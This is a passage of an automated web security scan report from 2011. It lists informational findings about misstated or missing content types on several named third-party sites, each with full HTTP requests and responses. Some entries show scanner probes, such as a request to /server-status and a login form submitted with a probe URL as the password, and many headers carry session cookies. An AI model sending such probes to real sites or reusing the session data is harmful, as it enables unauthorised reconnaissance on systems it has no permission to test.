User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NS_VER=2011.1.0; __utmz=1.1303742452.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=k23zN1HJzNw2PWHTMzr6q1LqT1Q41y9Tz2M0V9JvpTH0mJ5TfxDLbGQpDm2qpc2ThmqSMyK39KWhLDnCtK6fYxHWtxqSfGGZGG53PyJw5wXyXYk1y7kppJz4hQqHll7q!-577847599; NLVisitorId=rcHW8495Af7oGhFy; NLShopperId=rcHW8495AQLpGtOI; bn_u=6923519460848807096; __utma=1.1781939456.1303742452.1303742452.1303742452.1; __utmc=1; __utmb=1.5.10.1303742452; mbox=session#1303736347554-914602#1303745022|PC#1303736347554-914602.17#1304952762|check#true#1303743222; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fpage_not_found.shtml%22%2C%22r%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fpages%2Fportal%2Fpage_not_found.jspinternal%3DT%22%2C%22t%22%3A1303743275975%2C%22u%22%3A%226923519460848807096%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fecommerce%2Fwebsite-hosting.shtml%22%2C%22l%22%3A%22Ecommerce%20-%20SEO%22%2C%22de%22%3A%7B%22su%22%3A%22NetSuite%20for%20mid-sized%20businesses%20adds%20advanced%20accounting%2C%20customer%20relationship%20management%2C%20and%20SFA%20to%20the%20NetSuite%20family.%20Includes%3A%20NetSuite%20Accounting%2C%20NetSuite%20CRM%2C%20NetSuite%20SFA%2C%20NetSuite%20Knowledge%20Base%2C%20and%20NetSuite%20Vendor%20Center.%22%2C%22ti%22%3A%22NetSuite%20%7C%20Form%22%2C%22nw%22%3A173%2C%22nl%22%3A46%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Disposition: inline;filename="prototype.js"
NS_RTIMER_COMPOSITE: -102598731:73686F702D6A6176613031342E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=2627
Date: Mon, 25 Apr 2011 14:54:25 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 99594

/* Prototype JavaScript framework, version 1.5.1.1
* (c) 2005-2007 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prot
...[SNIP]...
35.107. http://www.reputationchanger.com/images/rc.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.reputationchanger.com
Path:   /images/rc.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /images/rc.ico HTTP/1.1
Host: www.reputationchanger.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:03:57 GMT
Server: Apache
Last-Modified: Wed, 09 Mar 2011 19:16:13 GMT
ETag: "7f4eaa-47e-49e118feab940"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain

............ .h.......(....... ..... .....................................................DBB.@==.8690.......! .#. .#. .#. .#.....................yvt.KHA..y.DEL.:5,.665......... .#. .#. .#...........
...[SNIP]...
35.108. http://www.smpone.com/javascript/common.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.smpone.com
Path:   /javascript/common.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/common.php HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.1.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733867

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 5596

/*************************************************
   . Copyright 2006 - 2009 Tres Media Group, Inc.
   The code contained within cannot be reproduced
   or modified without the expressed permission o
...[SNIP]...
35.109. http://www.smpone.com/javascript/image_pop.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.smpone.com
Path:   /javascript/image_pop.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/image_pop.php HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.1.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733867

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 2298

// <a href="me.jpg" onclick="return popImage(this.href,'Site author');">link</a>

//really not important (the first two should be small for Opera's sake)
PositionX = 10;
PositionY = 10;
defaultWi
...[SNIP]...
35.110. http://www.smpone.com/javascript/showimages.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.smpone.com
Path:   /javascript/showimages.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/showimages.php HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.1.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733867

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 317

function showimage() {
   if (!document.images)
       return
       document.images.avatar.src= 'images/Avatars/' + document.Register.av_avatar_pre.options[document.Register.av_avatar_pre.selectedIndex].value
...[SNIP]...
35.111. http://www.tresware.com/javascript/bbcode.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tresware.com
Path:   /javascript/bbcode.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/bbcode.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 2394

function x() {
   return;
}

var thisForm;

function mozWrap(txtarea, lft, rgt, pmt, pmr) {
   var selLength = txtarea.textLength;
   var selStart = txtarea.selectionStart;
   var selEnd = txtarea.se
...[SNIP]...
35.112. http://www.tresware.com/javascript/common.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tresware.com
Path:   /javascript/common.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/common.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 1364

/*************************************************
   . Copyright 2006 - 2008 Tres Media Group, Inc.
   The code contained within cannot be reproduced
   or modified without the expressed permission of:
   Tr
...[SNIP]...
35.113. http://www.tresware.com/javascript/edittags.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tresware.com
Path:   /javascript/edittags.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/edittags.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 1561

adminbuttonsFlag = false;
function adminbuttons() {

   var divareas = document.getElementsByTagName('button');
   var editbuttons = new Array();
   for(var i in divareas) {
       if(divareas[i].id) {


...[SNIP]...
35.114. http://www.tresware.com/javascript/image_pop.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tresware.com
Path:   /javascript/image_pop.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/image_pop.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 2298

// <a href="me.jpg" onclick="return popImage(this.href,'Site author');">link</a>

//really not important (the first two should be small for Opera's sake)
PositionX = 10;
PositionY = 10;
defaultWi
...[SNIP]...
35.115. http://www.tresware.com/javascript/showimages.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tresware.com
Path:   /javascript/showimages.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/showimages.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 317

function showimage() {
   if (!document.images)
       return
       document.images.avatar.src= 'images/Avatars/' + document.Register.av_avatar_pre.options[document.Register.av_avatar_pre.selectedIndex].value
...[SNIP]...
35.116. http://www.trucklist.ru/webroot/delivery/js/scripts.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/scripts.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /webroot/delivery/js/scripts.js?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:41:04 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 59289
Last-Modified: Tue, 01 Mar 2011 08:25:06 GMT
Connection: keep-alive
Expires: Wed, 25 May 2011 14:41:04 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

...window.reEmail = /^([\w\.\-])+@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/i;

var w3cDOM = (typeof document.getElementById != "undefined" && typeof document.createElement != "undefined") ? true : fa
...[SNIP]...
35.117. http://www.trust-guard.com/Templates/New-Green/Images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.trust-guard.com
Path:   /Templates/New-Green/Images/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /Templates/New-Green/Images/favicon.ico HTTP/1.1
Host: www.trust-guard.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6qd9acevi2gacre2qugrcn54a3; __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; __utmc=147269874; __utmb=147269874.1.10.1303748966

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:29:15 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 04 Sep 2010 00:48:34 GMT
ETag: "3ff07b6-47e-48f64682b1c80"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....................................................III.AAA.................................................www.#"#.Ks:.Hn6.....UUU...............................
...[SNIP]...
35.118. https://www.trust-guard.com/Images/BuyPage/scan-buttons/ScanBtns-gray_01.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.trust-guard.com
Path:   /Images/BuyPage/scan-buttons/ScanBtns-gray_01.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /Images/BuyPage/scan-buttons/ScanBtns-gray_01.jpg HTTP/1.1
Host: www.trust-guard.com
Connection: keep-alive
Referer: https://www.trust-guard.com/compare-Trust-Seals-s/1.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6qd9acevi2gacre2qugrcn54a3; __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; __utmc=147269874; __utmb=147269874.6.10.1303748966

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:30:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 29 Mar 2011 18:20:13 GMT
ETag: "5050019-200-49fa31c78b140"
Accept-Ranges: bytes
Content-Length: 512
Cache-Control: max-age=5184000, public
Connection: close
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

.............................................................*.)..
...[SNIP]...
35.119. https://www.trust-guard.com/Images/BuyPage/scan-buttons/ScanBtns-gray_05.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.trust-guard.com
Path:   /Images/BuyPage/scan-buttons/ScanBtns-gray_05.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /Images/BuyPage/scan-buttons/ScanBtns-gray_05.jpg HTTP/1.1
Host: www.trust-guard.com
Connection: keep-alive
Referer: https://www.trust-guard.com/compare-Trust-Seals-s/1.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6qd9acevi2gacre2qugrcn54a3; __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; __utmc=147269874; __utmb=147269874.6.10.1303748966

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:30:48 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 29 Mar 2011 18:20:13 GMT
ETag: "505001c-c00-49fa31c78b140"
Accept-Ranges: bytes
Content-Length: 3072
Cache-Control: max-age=5184000, public
Connection: close
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

.............................................................*....
...[SNIP]...
35.120. https://www.trust-guard.com/Images/BuyPage/scan-buttons/ScanBtns-gray_07.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.trust-guard.com
Path:   /Images/BuyPage/scan-buttons/ScanBtns-gray_07.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /Images/BuyPage/scan-buttons/ScanBtns-gray_07.jpg HTTP/1.1
Host: www.trust-guard.com
Connection: keep-alive
Referer: https://www.trust-guard.com/compare-Trust-Seals-s/1.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6qd9acevi2gacre2qugrcn54a3; __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; __utmc=147269874; __utmb=147269874.6.10.1303748966

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:30:48 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 29 Mar 2011 18:20:13 GMT
ETag: "5050014-200-49fa31c78b140"
Accept-Ranges: bytes
Content-Length: 512
Cache-Control: max-age=5184000, public
Connection: close
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

.............................................................*....
...[SNIP]...
35.121. https://www.trust-guard.com/Templates/New-Green/Images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.trust-guard.com
Path:   /Templates/New-Green/Images/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /Templates/New-Green/Images/favicon.ico HTTP/1.1
Host: www.trust-guard.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6qd9acevi2gacre2qugrcn54a3; __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; __utmc=147269874; __utmb=147269874.6.10.1303748966

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:30:50 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 04 Sep 2010 00:48:34 GMT
ETag: "3ff07b6-47e-48f64682b1c80"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....................................................III.AAA.................................................www.#"#.Ks:.Hn6.....UUU...............................
...[SNIP]...
36. Content type is not specified  previous  next
There are 8 instances of this issue:

36.1. https://checkout.netsuite.com/server-info  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /server-info

Request

GET /server-info HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length:137

<html><head><META http-equiv="refresh" content="0 ;URL=http://www.netsuite.com/pages/portal/page_not_found.jspinternal=T"/></head></html>
36.2. https://checkout.netsuite.com/server-status  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /server-status

Request

GET /server-status HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744322|PC#1303736347554-914602.17#1366814462|check#true#1303742522

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length:137

<html><head><META http-equiv="refresh" content="0 ;URL=http://www.netsuite.com/pages/portal/page_not_found.jspinternal=T"/></head></html>
36.3. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Request

POST /hmc/report/index.cfm? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 51

j_password=http://netsparker.com/n&j_username=Smith

Response

HTTP/1.1 100 Continue

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:36 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:39 GMT;path=/
Content-Language: en-
...[SNIP]...
</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<link href="/styles/albertson2_3_production_Sep24/hmc.css" rel="stylesheet" type="text/css">
...[SNIP]...
36.4. http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kronos.tt.omtrdc.net
